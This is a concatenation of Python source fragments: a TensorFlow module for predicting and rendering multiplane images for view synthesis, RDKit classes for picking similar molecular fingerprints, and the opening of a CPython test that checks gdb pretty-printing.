Pratul P. Srinivasan, Richard Tucker, Jonathan T. Barron, Ravi Ramamoorthi, Ren
Ng, Noah Snavely
Modified from code written by Tinghui Zhou
(https://github.com/google/stereo-magnification).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
import numpy as np
import tensorflow.compat.v1 as tf
import mpi_extrapolation.geometry.projector as pj
from mpi_extrapolation.nets import build_vgg19
from mpi_extrapolation.nets import ed_3d_net
from mpi_extrapolation.nets import refine_net
class MPI(object):
  """Class definition for MPI learning module.

  Builds the TF1 graph for predicting, refining and rendering multiplane
  images (MPIs), plus a training loop driver.
  """

  def __init__(self):
    # Stateless; all configuration is passed to the graph-building methods.
    pass

  # NOTE(review): the np.array(...) defaults below are mutable default
  # arguments; safe only as long as callers never mutate them in place.
  def infer_mpi(self, raw_src_images, raw_ref_image, ref_pose, src_poses,
                intrinsics, num_mpi_planes, mpi_planes,
                run_patched=False,
                patch_ind=np.array([0, 0]),
                patchsize=np.array([256, 256]),
                outsize=np.array([128, 128])):
    """Construct the MPI inference graph.

    Args:
      raw_src_images: stack of source images [batch, height, width, 3*#source]
      raw_ref_image: reference image [batch, height, width, 3]
      ref_pose: reference frame pose (world to camera) [batch, 4, 4]
      src_poses: source frame poses (world to camera) [batch, #source, 4, 4]
      intrinsics: camera intrinsics [batch, 3, 3]
      num_mpi_planes: number of mpi planes to predict
      mpi_planes: list of plane depths
      run_patched: whether to only infer MPI for patches of PSV (inference only)
      patch_ind: patch index for infer MPI inference
      patchsize: spatial patch size for MPI inference
      outsize: size of central portion to keep for patched inference

    Returns:
      outputs: a collection of output tensors.
    """
    with tf.name_scope("preprocessing"):
      # Map images into [-1, 1] for the networks.
      src_images = self.preprocess_image(raw_src_images)
      ref_image = self.preprocess_image(raw_ref_image)
    with tf.name_scope("format_network_input"):
      # WARNING: we assume the first src image/pose is the reference
      net_input = self.format_network_input(ref_image, src_images[:, :, :, 3:],
                                            ref_pose, src_poses[:, 1:],
                                            mpi_planes, intrinsics)
    with tf.name_scope("layer_prediction"):
      # The network directly outputs the color image at each MPI plane.
      chout = 4  # Number of output channels, RGBA
      if run_patched:
        # Patch the PSV spatially, with buffer, and generate MPI patch
        # Only for inference (not implemented for training)
        buffersize = (patchsize - outsize) // 2
        padding = [[0, 0], [buffersize[0], buffersize[0]],
                   [buffersize[1], buffersize[1]], [0, 0], [0, 0]]
        net_input_pad = tf.pad(net_input, padding)
        patch_start = patch_ind * outsize
        patch_end = patch_start + patchsize
        net_input_patch = net_input_pad[:, patch_start[0]:patch_end[0],
                                        patch_start[1]:patch_end[1], :, :]
        rgba_layers, _ = ed_3d_net(net_input_patch, chout)
      else:
        # Generate entire MPI (training and inference, but takes more memory)
        print("first step MPI prediction")
        rgba_layers, _ = ed_3d_net(net_input, chout)
      # Split net output into color (first 3 channels) and alpha (last).
      color_layers = rgba_layers[:, :, :, :, :-1]
      alpha_layers = rgba_layers[:, :, :, :, -1:]
      # Rescale alphas from tanh range (-1, 1) to (0, 1)
      alpha_layers = (alpha_layers + 1.)/2.
      rgba_layers = tf.concat([color_layers, alpha_layers], axis=4)

      print("refining MPI")
      # Transmittance weights each voxel by its visibility from the
      # reference camera; used to build the refinement network's input.
      transmittance = self.compute_transmittance(alpha_layers)
      refine_input_colors = color_layers * transmittance
      refine_input_alpha = alpha_layers * transmittance
      # Cumulative sum over the plane axis: what is "behind" each plane.
      stuff_behind = tf.cumsum(refine_input_colors, axis=3)
      concat_trans = True  # Concatenate transmittance to second input
      if concat_trans:
        # stop_gradient: the refinement stage must not backprop into the
        # first-stage MPI through these inputs.
        refine_input = tf.concat([tf.stop_gradient(refine_input_colors),
                                  tf.stop_gradient(stuff_behind),
                                  tf.stop_gradient(refine_input_alpha),
                                  tf.stop_gradient(transmittance)], axis=4)
      # Append a normalized plane-index channel so the net knows depth.
      normalized_disp_inds = tf.reshape(tf.linspace(0.0, 1.0, num_mpi_planes),
                                        [1, 1, 1, num_mpi_planes, 1])
      sh = tf.shape(refine_input)
      normalized_disp_inds_stack = tf.tile(normalized_disp_inds,
                                           [1, sh[1], sh[2], 1, 1])
      refine_input = tf.concat([refine_input, normalized_disp_inds_stack],
                               axis=4)
      print("refine input size:", refine_input.shape)
      rgba_layers_refine = refine_net(refine_input)
      print("predicting flow for occlusions")
      # The refine net predicts 2D flow vectors (first 2 channels) used to
      # gather colors from the cumulative render, plus an alpha channel.
      flow_source = tf.stop_gradient(stuff_behind)
      flow_vecs = rgba_layers_refine[:, :, :, :, :2]
      color_layers = pj.flow_gather(flow_source, flow_vecs)
      alpha_layers = rgba_layers_refine[:, :, :, :, -1:]
      # Rescale alphas to (0, 1)
      alpha_layers = (alpha_layers + 1.)/2.
      rgba_layers_refine = tf.concat([color_layers, alpha_layers], axis=4)

    # Collect output tensors
    pred = {}
    pred["rgba_layers"] = rgba_layers
    pred["rgba_layers_refine"] = rgba_layers_refine
    pred["refine_input_mpi"] = tf.concat([refine_input_colors,
                                          refine_input_alpha], axis=-1)
    pred["stuff_behind"] = stuff_behind
    pred["flow_vecs"] = flow_vecs
    pred["psv"] = net_input[:, :, :, :, 0:3]
    # Add pred tensors to outputs collection (for retrieval at test time).
    print("adding outputs to collection")
    for i in pred:
      tf.add_to_collection("outputs", pred[i])
    return pred

  def mpi_render_view(self, input_mpi, tgt_pose, planes, intrinsics):
    """Render a target view from MPI representation.

    Args:
      input_mpi: input MPI [batch, height, width, #planes, 4]
      tgt_pose: target pose (relative) to render from [batch, 4, 4]
      planes: list of depth for each plane
      intrinsics: camera intrinsics [batch, 3, 3]

    Returns:
      rendered view [batch, height, width, 3]
    """
    batch_size, _, _ = tgt_pose.get_shape().as_list()
    rgba_layers = input_mpi
    # Format for homography code: planes-major layout and per-batch depths.
    depths = tf.tile(planes[:, tf.newaxis], [1, batch_size])
    rgba_layers = tf.transpose(rgba_layers, [3, 0, 1, 2, 4])
    # Render target viewpoint
    proj_images = pj.projective_forward_homography(
        rgba_layers, intrinsics, tgt_pose, depths)
    proj_images = tf.transpose(proj_images, [1, 2, 3, 0, 4])
    # Alpha-composite the warped planes back-to-front.
    output_image = pj.over_composite(proj_images)
    output_image.set_shape([None, None, None, 3])
    return output_image, proj_images

  def build_train_graph(self,
                        inputs,
                        min_depth,
                        max_depth,
                        num_mpi_planes,
                        learning_rate=0.0002,
                        beta1=0.9,
                        vgg_model_file=None,
                        global_step=0):
    """Construct the training computation graph.

    Args:
      inputs: dictionary of tensors (see 'input_data' below) needed for training
      min_depth: minimum depth for the PSV and MPI planes
      max_depth: maximum depth for the PSV and MPI planes
      num_mpi_planes: number of MPI planes to infer (overridden below by the
        per-step size randomization)
      learning_rate: learning rate
      beta1: hyperparameter for Adam
      vgg_model_file: path to vgg weights (needed when vgg loss is used)
      global_step: current optimization step

    Returns:
      A train_op to be used for training.
    """
    print("starting to build graph")
    with tf.name_scope("input_size_randomization"):
      # Each row is [spatial downsampling divisor, number of MPI planes];
      # a random row is drawn every training step.
      dim_choices = tf.constant([[1, 16], [2, 32], [4, 32], [4, 64], [4, 128],
                                 [8, 32], [8, 64], [8, 128]],
                                dtype=tf.int32)
      rand_dim = tf.random_shuffle(dim_choices)[0, :]
      height_div = rand_dim[0]
      # NOTE(review): width_div reuses rand_dim[0], so height and width are
      # always downsampled by the same factor — presumably intentional
      # (uniform scaling), but confirm.
      width_div = rand_dim[0]
      num_mpi_planes = rand_dim[1]
      tf.summary.scalar("num_mpi_planes", num_mpi_planes)
    with tf.name_scope("setup"):
      mpi_planes = self.inv_depths(min_depth, max_depth, num_mpi_planes)
    with tf.name_scope("input_data"):
      raw_tgt_image = inputs["tgt_image"]
      raw_ref_image = inputs["ref_image"]
      raw_src_images = inputs["src_images"]
      _, img_height, img_width, _ = raw_src_images.get_shape().as_list(
      )
      # Apply the randomized spatial downsampling.
      img_height = img_height // height_div
      img_width = img_width // width_div
      raw_tgt_image = tf.image.convert_image_dtype(
          raw_tgt_image, dtype=tf.float32)
      raw_ref_image = tf.image.convert_image_dtype(
          raw_ref_image, dtype=tf.float32)
      raw_src_images = tf.image.convert_image_dtype(
          raw_src_images, dtype=tf.float32)
      raw_tgt_image = tf.image.resize_area(raw_tgt_image,
                                           [img_height, img_width])
      raw_ref_image = tf.image.resize_area(raw_ref_image,
                                           [img_height, img_width])
      raw_src_images = tf.image.resize_area(raw_src_images,
                                            [img_height, img_width])
      tgt_pose = inputs["tgt_pose"]
      ref_pose = inputs["ref_pose"]
      src_poses = inputs["src_poses"]
      intrinsics = inputs["intrinsics"]
      # Scale intrinsics based on size randomization (fx row by width,
      # fy row by height; bottom row unchanged).
      intrinsics = tf.concat([
          intrinsics[:, 0:1, :] / tf.to_float(width_div),
          intrinsics[:, 1:2, :] / tf.to_float(height_div), intrinsics[:, 2:3, :]
      ],
                             axis=1)
      inputs["intrinsics"] = intrinsics
      _, num_source, _, _ = src_poses.get_shape().as_list()
    with tf.name_scope("inference"):
      print("setting up MPI inference")
      num_mpi_planes = tf.shape(mpi_planes)[0]
      pred = self.infer_mpi(raw_src_images, raw_ref_image, ref_pose, src_poses,
                            intrinsics, num_mpi_planes,
                            mpi_planes)
      rgba_layers = pred["rgba_layers"]
      rgba_layers_refine = pred["rgba_layers_refine"]
      stuff_behind = pred["stuff_behind"]
      refine_input_mpi = pred["refine_input_mpi"]
      psv = pred["psv"]
    with tf.name_scope("synthesis"):
      print("setting up rendering")
      # Pose of the target camera relative to the reference camera.
      rel_pose = tf.matmul(tgt_pose, tf.matrix_inverse(ref_pose))
      output_image, output_layers = self.mpi_render_view(
          rgba_layers, rel_pose, mpi_planes, intrinsics)
      output_alpha = output_layers[Ellipsis, -1]
      output_image_refine, _ = self.mpi_render_view(
          rgba_layers_refine, rel_pose, mpi_planes, intrinsics)
    with tf.name_scope("loss"):
      print("computing losses")
      # Mask loss for pixels outside reference frustum
      loss_mask = tf.where(
          tf.equal(
              tf.reduce_min(
                  tf.abs(tf.reduce_sum(output_layers, axis=-1)),
                  axis=3,
                  keep_dims=True), 0.0),
          tf.zeros_like(output_alpha[:, :, :, 0:1]),
          tf.ones_like(output_alpha[:, :, :, 0:1]))
      loss_mask = tf.stop_gradient(loss_mask)
      tf.summary.image("loss_mask", loss_mask)
      # Helper functions for loss
      def compute_error(real, fake, mask):
        # Masked mean absolute error.
        return tf.reduce_mean(mask * tf.abs(fake - real))
      # Normalized VGG loss (from
      # https://github.com/CQFIO/PhotographicImageSynthesis)
      downsample = lambda tensor, ds: tf.nn.avg_pool(tensor, [1, ds, ds, 1],
                                                     [1, ds, ds, 1], "SAME")
      def vgg_loss(raw_tgt_image, output_image, loss_mask):
        """Compute VGG loss."""
        vgg_real = build_vgg19(raw_tgt_image * 255.0, vgg_model_file)
        # Map network output from [-1, 1] back to [0, 255] for VGG.
        rescaled_output_image = (output_image + 1.)/2. * 255.0
        vgg_fake = build_vgg19(
            rescaled_output_image, vgg_model_file, reuse=True)
        # Per-layer feature losses; divisors are empirical normalizers.
        p0 = compute_error(vgg_real["input"], vgg_fake["input"], loss_mask)
        p1 = compute_error(vgg_real["conv1_2"],
                           vgg_fake["conv1_2"],
                           loss_mask)/2.6
        p2 = compute_error(vgg_real["conv2_2"],
                           vgg_fake["conv2_2"],
                           downsample(loss_mask, 2))/4.8
        p3 = compute_error(vgg_real["conv3_2"],
                           vgg_fake["conv3_2"],
                           downsample(loss_mask, 4))/3.7
        p4 = compute_error(vgg_real["conv4_2"],
                           vgg_fake["conv4_2"],
                           downsample(loss_mask, 8))/5.6
        p5 = compute_error(vgg_real["conv5_2"],
                           vgg_fake["conv5_2"],
                           downsample(loss_mask, 16))*10/1.5
        total_loss = p0+p1+p2+p3+p4+p5
        return total_loss, vgg_real, vgg_fake
      # Supervise both the first-stage and refined renders.
      vgg_loss_initial, _, _ = vgg_loss(raw_tgt_image, output_image, loss_mask)
      tf.summary.scalar("vgg_loss_initial", vgg_loss_initial)
      total_loss = vgg_loss_initial
      vgg_loss_refine, _, _ = vgg_loss(raw_tgt_image, output_image_refine,
                                       loss_mask)
      tf.summary.scalar("vgg_loss_refine", vgg_loss_refine)
      total_loss += vgg_loss_refine
    with tf.name_scope("train_op"):
      print("setting up train op")
      train_vars = [var for var in tf.trainable_variables()]
      optim = tf.train.AdamOptimizer(learning_rate, beta1)
      grads_and_vars = optim.compute_gradients(total_loss, var_list=train_vars)
      train_op = [optim.apply_gradients(grads_and_vars)]
    # Summaries
    tf.summary.scalar("total_loss", total_loss)
    # Source images
    for i in range(num_source):
      src_image = raw_src_images[:, :, :, i*3:(i+1)*3]
      tf.summary.image("src_image_%d" % i, src_image)
    # Output image
    tf.summary.image("output_image", self.deprocess_image(output_image))
    # Refined output image
    tf.summary.image("output_image_refine",
                     self.deprocess_image(output_image_refine))
    # Target image
    tf.summary.image("tgt_image", raw_tgt_image)
    # Ref image
    tf.summary.image("ref_image", raw_ref_image)
    # Predicted color and alpha layers, and PSV
    num_summ = 16  # Number of plane summaries to show in tensorboard
    for i in range(num_summ):
      # Sample planes evenly across the (dynamic) plane axis.
      ind = tf.to_int32(i * num_mpi_planes/num_summ)
      rgb = rgba_layers[:, :, :, ind, :3]
      alpha = rgba_layers[:, :, :, ind, -1:]
      ref_plane = psv[:, :, :, ind, 3:6]
      source_plane = psv[:, :, :, ind, :3]
      output_rgb = output_layers[:, :, :, ind, :3]
      tf.summary.image("rgb_layer_%d" % i, self.deprocess_image(rgb))
      tf.summary.image("alpha_layer_%d" % i, alpha)
      tf.summary.image("rgba_layer_%d" % i, self.deprocess_image(rgb * alpha))
      tf.summary.image("psv_avg_%d" % i,
                       (self.deprocess_image(0.5*ref_plane + 0.5*source_plane)))
      tf.summary.image("output_rgb_%d" % i,
                       self.deprocess_image(output_rgb))
      tf.summary.image("psv_ref_%d" % i, self.deprocess_image(ref_plane))
      tf.summary.image("psv_source_%d" % i, self.deprocess_image(source_plane))
    # Cumulative rendered images and refined MPI
    for i in range(num_summ):
      ind = tf.to_int32(i * num_mpi_planes/num_summ)
      rgb = rgba_layers_refine[:, :, :, ind, :3]
      alpha = rgba_layers_refine[:, :, :, ind, 3:]
      render = stuff_behind[:, :, :, ind, :3]
      input_colors = refine_input_mpi[:, :, :, ind, :3]
      tf.summary.image("rgb_layer_refine_%d" % i, self.deprocess_image(rgb))
      tf.summary.image("alpha_layer_refine_%d" % i, alpha)
      tf.summary.image("rgba_layer_refine_%d" % i,
                       self.deprocess_image(rgb * alpha))
      tf.summary.image("cumulative_render_%d" % i, self.deprocess_image(render))
      tf.summary.image("input_colors_refine_%d" % i,
                       self.deprocess_image(input_colors))
    return train_op

  def train(self, train_op, load_dir, checkpoint_dir, summary_dir,
            continue_train, summary_freq, save_latest_freq, max_steps,
            global_step):
    """Runs the training procedure.

    Args:
      train_op: op for training the network
      load_dir: where to load pretrained model
      checkpoint_dir: where to save the model checkpoints
      summary_dir: where to save the tensorboard summaries
      continue_train: whether to restore training from previous checkpoint
      summary_freq: summary frequency
      save_latest_freq: Frequency of model saving
      max_steps: maximum training steps
      global_step: tf Variable for current optimization step
    """
    # parameter_count = tf.reduce_sum(
    #     [tf.reduce_prod(tf.shape(v)) for v in tf.trainable_variables()])
    incr_global_step = tf.assign(global_step, global_step + 1)
    saver = tf.train.Saver([var for var in tf.trainable_variables()] +
                           [global_step],
                           max_to_keep=None)
    # saver=None: checkpointing is done manually below, not by the Supervisor.
    sv = tf.train.Supervisor(logdir=summary_dir, save_summaries_secs=0,
                             saver=None)
    config = tf.ConfigProto()
    config.gpu_options.allow_growth = True
    with sv.managed_session("local", config=config) as sess:
      if continue_train:
        checkpoint = tf.train.latest_checkpoint(load_dir)
        if checkpoint is not None:
          print("Resume training from previous checkpoint:", checkpoint)
          saver.restore(sess, checkpoint)
      print("starting training iters")
      for step in range(1, max_steps):
        start_time = time.time()
        fetches = {
            "train": train_op,
            "global_step": global_step,
            "incr_global_step": incr_global_step,
        }
        if step % summary_freq == 0:
          fetches["summary"] = sv.summary_op
        results = sess.run(fetches)
        gs = results["global_step"]
        if step % summary_freq == 0:
          sv.summary_writer.add_summary(results["summary"], gs)
          print("[Step %.8d] time: %4.4f/it" % (gs, time.time() - start_time))
        if step % save_latest_freq == 0:
          print(" [*] Saving checkpoint to %s..." % checkpoint_dir)
          saver.save(
              sess, os.path.join(checkpoint_dir, "model.ckpt"), global_step=gs)

  def format_network_input(self, ref_image, psv_src_images, ref_pose,
                           psv_src_poses, planes, intrinsics):
    """Format the network input.

    Args:
      ref_image: reference source image [batch, height, width, 3]
      psv_src_images: stack of source images (excluding the ref image)
        [batch, height, width, 3*(num_source -1)]
      ref_pose: reference world-to-camera pose (where PSV is constructed)
        [batch, 4, 4]
      psv_src_poses: input poses (world to camera) [batch, num_source-1, 4, 4]
      planes: list of scalar depth values for each plane
      intrinsics: camera intrinsics [batch, 3, 3]

    Returns:
      net_input: [batch, height, width, #planes, num_source*3]
    """
    _, num_psv_source, _, _ = psv_src_poses.get_shape().as_list()
    num_planes = tf.shape(planes)[0]
    net_input = []
    for i in range(num_psv_source):
      # Pose of source camera i relative to the reference camera.
      curr_pose = tf.matmul(psv_src_poses[:, i], tf.matrix_inverse(ref_pose))
      curr_image = psv_src_images[:, :, :, i*3:(i+1)*3]
      curr_psv = pj.plane_sweep(curr_image, planes, curr_pose, intrinsics)
      net_input.append(curr_psv)
    net_input = tf.concat(net_input, axis=4)
    # The reference image is identical at every plane, so just tile it.
    ref_img_stack = tf.tile(
        tf.expand_dims(ref_image, 3), [1, 1, 1, num_planes, 1])
    net_input = tf.concat([net_input, ref_img_stack], axis=4)
    # Append normalized plane indices
    normalized_disp_inds = tf.reshape(tf.linspace(0.0, 1.0, num_planes),
                                      [1, 1, 1, num_planes, 1])
    sh = tf.shape(net_input)
    normalized_disp_inds_stack = tf.tile(normalized_disp_inds,
                                         [1, sh[1], sh[2], 1, 1])
    net_input = tf.concat([net_input, normalized_disp_inds_stack], axis=4)
    return net_input

  def preprocess_image(self, image):
    """Preprocess the image for CNN input.

    Args:
      image: the input image in either float [0, 1] or uint8 [0, 255]

    Returns:
      A new image converted to float with range [-1, 1]
    """
    image = tf.image.convert_image_dtype(image, dtype=tf.float32)
    return image * 2.0 - 1.0

  def deprocess_image(self, image):
    """Undo the preprocessing.

    Args:
      image: the input image in float with range [-1, 1]

    Returns:
      A new image converted to uint8 [0, 255]
    """
    image = (image + 1.)/2.
    return tf.image.convert_image_dtype(image, dtype=tf.uint8)

  def inv_depths(self, start_depth, end_depth, num_depths):
    """Returns reversed, sorted inverse interpolated depths.

    Args:
      start_depth: The first depth.
      end_depth: The last depth.
      num_depths: The total number of depths to create, include start_depth and
        end_depth are always included and other depths are interpolated
        between them, in inverse depth space.

    Returns:
      The depths sorted in descending order (so furthest first). This order is
      useful for back to front compositing.
    """
    depths = 1.0 / tf.linspace(1.0/end_depth, 1.0/start_depth, num_depths)
    return depths

  def compute_transmittance(self, alpha):
    """Returns transmittance of MPI voxels in reference frame.

    Args:
      alpha: MPI alpha values

    Returns:
      Transmittance of each MPI voxel in reference frame.
    """
    # Exclusive reversed cumprod over the plane axis = fraction of light
    # surviving through all planes in front; the epsilon avoids a zero
    # product (and zero gradients) when any alpha is exactly 1.
    transmittance = tf.cumprod(
        1.0 - alpha + 1.0e-8, axis=3, exclusive=True, reverse=True) * alpha
    return transmittance

  def compute_occ_map(self, mpi_planes, rgba_layers, output_alpha,
                      intrinsics, rel_pose):
    """Computes an occlusion map, indicating which pixels are occluded/disoccluded.

    Args:
      mpi_planes: MPI plane depths
      rgba_layers: an MPI
      output_alpha: alphas from MPI that has been warped into target frame
      intrinsics: camera intrinsics [batch, 3, 3]
      rel_pose: relative pose to target camera pose

    Returns:
      One-sided occlusion map (positive diff in transmittance of target vs. ref)
    """
    # compute occlusion map, indicating which pixels are occluded/disoccluded
    # when rendering a novel view
    batch_size = tf.shape(rgba_layers)[0]
    img_height = tf.shape(rgba_layers)[1]
    img_width = tf.shape(rgba_layers)[2]
    num_mpi_planes = tf.shape(rgba_layers)[3]
    depths = tf.tile(mpi_planes[:, tf.newaxis], [1, batch_size])
    # Compute transmittance from reference viewpoint, then warp to tgt viewpoint
    trans_ref = self.compute_transmittance(
        tf.stop_gradient(rgba_layers[Ellipsis, -1]))
    trans_ref = tf.transpose(trans_ref, [3, 0, 1, 2])
    trans_ref = tf.expand_dims(trans_ref, -1)
    trans_ref_reproj = pj.projective_forward_homography(trans_ref, intrinsics,
                                                        rel_pose, depths)
    trans_ref_reproj = tf.reshape(
        trans_ref_reproj,
        [batch_size, num_mpi_planes, img_height, img_width, 1])
    trans_ref_reproj = tf.transpose(trans_ref_reproj, [0, 2, 3, 1, 4])
    # Compute transmittance of alphas that have been warped to tgt viewpoint
    trans_target = self.compute_transmittance(tf.stop_gradient(output_alpha))
    trans_target = tf.expand_dims(trans_target, -1)
    # One-sided occlusion map (positive diff in transmittance of target vs. ref)
    occ_map = tf.reduce_max(tf.nn.relu(trans_target - trans_ref_reproj), axis=3)
    return occ_map
| |
# $Id$
#
# Copyright (C) 2003-2008 Greg Landrum and Rational Discovery LLC
# All Rights Reserved
#
from __future__ import print_function
from rdkit import RDConfig
from rdkit import DataStructs
from rdkit.DataStructs.TopNContainer import TopNContainer
import bisect
class GenericPicker(object):
  """Abstract base class for pickers: lazily builds _picks on first access."""

  _picks = None

  def _ensurePicks(self):
    # Populate the pick list on first use.
    if self._picks is None:
      self.MakePicks()

  def MakePicks(self, force=0):
    """Subclasses must override this to fill self._picks."""
    raise NotImplementedError("GenericPicker is a virtual base class")

  def __len__(self):
    self._ensurePicks()
    return len(self._picks)

  def __getitem__(self, which):
    self._ensurePicks()
    return self._picks[which]
class TopNOverallPicker(GenericPicker):
  """ A class for picking the top N overall best matches across a library

  Connect to a database and build molecules:

  >>> from rdkit import Chem
  >>> import os.path
  >>> from rdkit.Dbase.DbConnection import DbConnect
  >>> dbName = RDConfig.RDTestDatabase
  >>> conn = DbConnect(dbName,'simple_mols1')
  >>> [x.upper() for x in conn.GetColumnNames()]
  ['SMILES', 'ID']
  >>> mols = []
  >>> for smi,id in conn.GetData():
  ...   mol = Chem.MolFromSmiles(str(smi))
  ...   mol.SetProp('_Name',str(id))
  ...   mols.append(mol)
  >>> len(mols)
  12

  Calculate fingerprints:

  >>> probefps = []
  >>> for mol in mols:
  ...   fp = Chem.RDKFingerprint(mol)
  ...   fp._id = mol.GetProp('_Name')
  ...   probefps.append(fp)

  Start by finding the top matches for a single probe. This ether should pull
  other ethers from the db:

  >>> mol = Chem.MolFromSmiles('COC')
  >>> probeFp = Chem.RDKFingerprint(mol)
  >>> picker = TopNOverallPicker(numToPick=2,probeFps=[probeFp],dataSet=probefps)
  >>> len(picker)
  2
  >>> fp,score = picker[0]
  >>> id = fp._id
  >>> str(id)
  'ether-1'
  >>> score
  1.0

  The results come back in order:

  >>> fp,score = picker[1]
  >>> id = fp._id
  >>> str(id)
  'ether-2'

  Now find the top matches for 2 probes. We'll get one ether and one acid:

  >>> fps = []
  >>> fps.append(Chem.RDKFingerprint(Chem.MolFromSmiles('COC')))
  >>> fps.append(Chem.RDKFingerprint(Chem.MolFromSmiles('CC(=O)O')))
  >>> picker = TopNOverallPicker(numToPick=3,probeFps=fps,dataSet=probefps)
  >>> len(picker)
  3
  >>> fp,score = picker[0]
  >>> id = fp._id
  >>> str(id)
  'acid-1'
  >>> fp,score = picker[1]
  >>> id = fp._id
  >>> str(id)
  'ether-1'
  >>> score
  1.0
  >>> fp,score = picker[2]
  >>> id = fp._id
  >>> str(id)
  'acid-2'

  """

  def __init__(self, numToPick=10, probeFps=None, dataSet=None,
               simMetric=DataStructs.TanimotoSimilarity):
    """
    dataSet should be a sequence of BitVectors
    """
    self.numToPick = numToPick  # how many library members to return
    self.probes = probeFps      # probe fingerprints to compare against
    self.data = dataSet         # the library being searched
    self.simMetric = simMetric  # similarity metric callable
    self._picks = None          # computed lazily by MakePicks()

  def MakePicks(self, force=0):
    """Score every library member and keep the numToPick overall best.

    Each member's score is its best similarity to any probe.
    """
    if self._picks is not None and not force:
      return
    topN = TopNContainer(self.numToPick)
    for candidate in self.data:
      best = -1.0
      for probe in self.probes:
        sim = DataStructs.FingerprintSimilarity(candidate, probe,
                                                self.simMetric)
        if sim > best:
          best = sim
      topN.Insert(best, candidate)
    # TopNContainer iterates ascending; report best-first as (fp, score).
    self._picks = [(pt, score) for score, pt in topN]
    self._picks.reverse()
class SpreadPicker(GenericPicker):
  """ A class for picking the best matches across a library

  Connect to a database:

  >>> from rdkit import Chem
  >>> import os.path
  >>> from rdkit.Dbase.DbConnection import DbConnect
  >>> dbName = RDConfig.RDTestDatabase
  >>> conn = DbConnect(dbName,'simple_mols1')
  >>> [x.upper() for x in conn.GetColumnNames()]
  ['SMILES', 'ID']
  >>> mols = []
  >>> for smi,id in conn.GetData():
  ...   mol = Chem.MolFromSmiles(str(smi))
  ...   mol.SetProp('_Name',str(id))
  ...   mols.append(mol)
  >>> len(mols)
  12

  Calculate fingerprints:

  >>> probefps = []
  >>> for mol in mols:
  ...   fp = Chem.RDKFingerprint(mol)
  ...   fp._id = mol.GetProp('_Name')
  ...   probefps.append(fp)

  Start by finding the top matches for a single probe. This ether should pull
  other ethers from the db:

  >>> mol = Chem.MolFromSmiles('COC')
  >>> probeFp = Chem.RDKFingerprint(mol)
  >>> picker = SpreadPicker(numToPick=2,probeFps=[probeFp],dataSet=probefps)
  >>> len(picker)
  2
  >>> fp,score = picker[0]
  >>> id = fp._id
  >>> str(id)
  'ether-1'
  >>> score
  1.0

  The results come back in order:

  >>> fp,score = picker[1]
  >>> id = fp._id
  >>> str(id)
  'ether-2'

  Now find the top matches for 2 probes. We'll get one ether and one acid:

  >>> fps = []
  >>> fps.append(Chem.RDKFingerprint(Chem.MolFromSmiles('COC')))
  >>> fps.append(Chem.RDKFingerprint(Chem.MolFromSmiles('CC(=O)O')))
  >>> picker = SpreadPicker(numToPick=3,probeFps=fps,dataSet=probefps)
  >>> len(picker)
  3
  >>> fp,score = picker[0]
  >>> id = fp._id
  >>> str(id)
  'ether-1'
  >>> score
  1.0
  >>> fp,score = picker[1]
  >>> id = fp._id
  >>> str(id)
  'acid-1'
  >>> score
  1.0
  >>> fp,score = picker[2]
  >>> id = fp._id
  >>> str(id)
  'ether-2'

  """

  def __init__(self, numToPick=10, probeFps=None, dataSet=None,
               simMetric=DataStructs.TanimotoSimilarity, expectPickles=True,
               onlyNames=False):
    """
    dataSet should be a sequence of BitVectors or, if expectPickles
    is False, a set of strings that can be converted to bit vectors
    """
    self.numToPick = numToPick          # how many picks to return in total
    self.probes = probeFps              # probe fingerprints
    self.data = dataSet                 # the library being searched
    self.simMetric = simMetric          # similarity metric callable
    self.expectPickles = expectPickles  # whether dataSet holds pickled fps
    self.onlyNames = onlyNames          # keep only db names instead of fps
    self._picks = None                  # computed lazily by MakePicks()

  def MakePicks(self, force=0, silent=False):
    """Score the library and pick entries, spreading across the probes.

    Each probe keeps an ascending-sorted list of its numToPick best
    (score, index) pairs; picks are then drawn round-robin, probe by
    probe, taking each probe's best not-yet-taken entry.
    """
    if self._picks is not None and not force:
      return

    # Build the NxM score matrix (N = num probes, M = num fps), keeping
    # only the top numToPick entries per probe.
    nProbes = len(self.probes)
    scores = [[] for _ in range(nProbes)]
    j = 0
    fps = []
    for origFp in self.data:
      for i in range(nProbes):
        score = DataStructs.FingerprintSimilarity(self.probes[i], origFp,
                                                  self.simMetric)
        bisect.insort(scores[i], (score, j))
        if len(scores[i]) >= self.numToPick:
          # BUG FIX: the previous code did `del scores[self.numToPick:]`,
          # which truncated the list of probe rows instead of trimming this
          # probe's row. Trim the front (lowest scores) of the ascending
          # row so exactly the numToPick best entries remain.
          del scores[i][:-self.numToPick]
      if self.onlyNames and hasattr(origFp, '_fieldsFromDb'):
        fps.append(origFp._fieldsFromDb[0])
      else:
        fps.append(origFp)
      j += 1
      if not silent and not j % 1000:
        print('scored %d fps' % j)

    # Now go probe by probe and select the current top entry until we are
    # finished. Rows are ascending, so pop() yields each probe's best.
    nPicked = 0
    self._picks = []
    taken = [0] * len(fps)
    while nPicked < self.numToPick:
      rowIdx = nPicked % len(scores)
      row = scores[rowIdx]
      score, idx = row.pop()
      # make sure we haven't taken this one already (from another row):
      while taken[idx] and len(row):
        score, idx = row.pop()
      if not taken[idx]:
        fp = fps[idx]
        self._picks.append((fp, score))
        taken[idx] = 1
        nPicked += 1
#------------------------------------
#
# doctest boilerplate
#
def _test():
  """Run this module's doctests against __main__ and return the results."""
  import doctest
  import sys
  return doctest.testmod(sys.modules["__main__"])
if __name__ == '__main__':
  # Run the doctest suite; the number of failures becomes the exit status.
  import sys
  failed, tried = _test()
  sys.exit(failed)
| |
# Verify that gdb can pretty-print the various PyObject* types
#
# The code for testing gdb was adapted from similar work in Unladen Swallow's
# Lib/test/test_jit_gdb.py
import os
import re
import subprocess
import sys
import sysconfig
import unittest
import sysconfig
from test import test_support
from test.test_support import run_unittest, findfile
# Is this Python configured to support threads?
try:
    import thread
except ImportError:
    # Python 2 built without thread support; thread-dependent tests check
    # for None before running.
    thread = None
def get_gdb_version():
    """Return (full version text, major, minor) for the gdb on PATH.

    Raises unittest.SkipTest when gdb cannot be launched at all, and a
    plain Exception when the version banner is unparseable.
    """
    try:
        gdb_proc = subprocess.Popen(["gdb", "-nx", "--version"],
                                    stdout=subprocess.PIPE,
                                    stderr=subprocess.PIPE,
                                    universal_newlines=True)
        version = gdb_proc.communicate()[0]
    except OSError:
        # This is what "no gdb" looks like. There may, however, be other
        # errors that manifest this way too.
        raise unittest.SkipTest("Couldn't find gdb on the path")
    # Banners this regex must parse:
